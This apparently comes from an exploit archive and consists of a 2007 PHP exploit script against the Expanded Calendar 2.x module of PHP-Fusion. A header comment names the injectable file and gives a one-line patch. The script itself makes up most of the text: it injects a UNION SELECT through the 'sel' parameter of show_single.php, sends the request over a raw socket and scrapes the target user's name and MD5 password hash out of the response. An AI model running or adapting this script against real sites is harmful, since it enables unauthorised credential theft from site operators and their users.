Home / os / win10

phpfusionex-sql.txt

Posted on 02 October 2007

<?php
print_r("
/********************************************************
*      Expanded Calendar 2.x (PHP-Fusion module)        *
*      User pass disclosure exploit                     *
*      Found by Matrix86 of Rbt-4 Crew                  *
*      Site: www.rbt-4.net                              *
*      Mail: info[at]rbt-4[dot]net                      *
*********************************************************
* Bug found in                                          *
*      /infusions/calendar_events_panel/show_single.php *
* Line:                                                 *
*      27                                               *
* Vulnerability type: Sql injection                     *
* Unpatched!                                            *
* Patch:                                                *
* Line 26:                                              *
* if(!isset($sel)||!isNum($sel)) fallback("index.php");
*
********************************************************/
");

if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id]
Example: ".$argv[0]." localhost /php-fusion/ 1
");

ini_set("max_execution_time",0);
ini_set("default_socket_timeout",4);

$host    = $argv[1];
$path    = $argv[2];
$user_id = $argv[3];
$port    = 80;

$sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";
$sqlend = "/*";

function send($req){
global $host,$port;

$ip = gethostbyname($host);
if(stristr($host,$ip)) die("Error: Host not found
");

if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock!
");

fputs($sock,$req);
$response = "";
while (!feof($sock)) {
$response .= fgets ($sock,128);
}
fclose ($sock);
return $response;
}

$packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0
";
$packet.= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)
";
$packet.= "Host: ".$host."
";
$packet.="Connection: Close

";
echo "Packet:
".$packet."

";

$resp = send($packet);
$temp  = explode("<td colspan='2'><font size='4'><u>",$resp);
$temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]);
$temp3 = explode("</td>",$temp2[1]);
$username = $temp3[0];

if(isset($temp[1])) {
$md5 = substr($temp[1],0,32);
echo "Id user:  ".$user_id."
Username: ".$username."
Password: ".$md5."
";
}
else echo("Bug Fixed..sorry!
");

exit();
?>

 

TOP

Malware :

Exploits :